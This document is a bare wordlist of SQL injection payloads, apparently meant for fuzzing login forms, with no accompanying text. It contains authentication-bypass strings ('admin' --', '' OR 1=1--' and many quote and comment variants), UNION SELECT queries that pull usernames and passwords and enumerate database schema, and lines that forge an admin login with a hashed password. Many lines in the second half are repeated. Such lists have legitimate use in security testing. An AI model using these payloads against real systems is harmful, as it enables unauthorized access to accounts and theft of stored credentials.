'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
' OR '1'='1
" OR "1"="1
' OR 'a'='a
" OR "a"="a
' OR 1=1--
" OR 1=1--
' OR 'x'='x
" OR "x"="x
' OR 1=1#
' OR 1=1/*
' OR '1'='1' --
" OR "1"="1" --
' OR ''='
" OR ""="
admin'--
admin' #
admin'/*
admin' or '1'='1
admin' or 1=1
admin' or '1'='1' --
admin' or '1'='1' #
admin' or '1'='1'/*
admin' or '1'='1'--
' UNION SELECT 1,2,3--
' UNION SELECT username, password FROM users--
' UNION SELECT null,null--
' UNION SELECT 1,table_name FROM information_schema.tables--
' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,2,3,4,5,6,7,8,9,10--
' OR '1'='1'#
' OR 1=1 LIMIT 1--
' OR 'x'='x'#
" OR 1=1#
" OR 'x'='x'#
' OR 1=1 LIMIT 1--
" OR 'a'='a'#
' OR 'a'='a'#
' OR 'a'='a' LIMIT 1--
' OR 1=1#
' OR ''='
" OR ""="
' OR 1=1--
" OR 1=1--
' OR '1'='1--
" OR "1"="1--
' OR '1'='1'--
' OR 1=1#
" OR 1=1#
' OR 1=1 LIMIT 1--
" OR 1=1 LIMIT 1--
' OR 'x'='x'#
" OR 'x'='x'#
' OR 'x'='x' LIMIT 1--
' OR 1=1#
' OR ''='
" OR ""="
' OR 'a'='a'--
" OR 'a'='a'--
' OR 'a'='a' LIMIT 1--
' OR 1=1#
' OR 'a'='a'#
' OR 1=1 LIMIT 1--
' OR 'x'='x'--
' OR 'x'='x'#
' OR 'x'='x' LIMIT 1--
' OR 1=1#
' OR ''='
" OR ""="
' OR 1=1--
" OR 1=1--
' OR '1'='1--
' OR '1'='1'--
' OR 'a'='a'--
' OR 'a'='a' LIMIT 1--
' OR 1=1#
' OR 'x'='x'#
' OR 1=1 LIMIT 1--
' OR '1'='1'--
' OR '1'='1'--
' OR 'x'='x' LIMIT 1--
' OR 1=1#
' OR ''='
" OR ""="
 
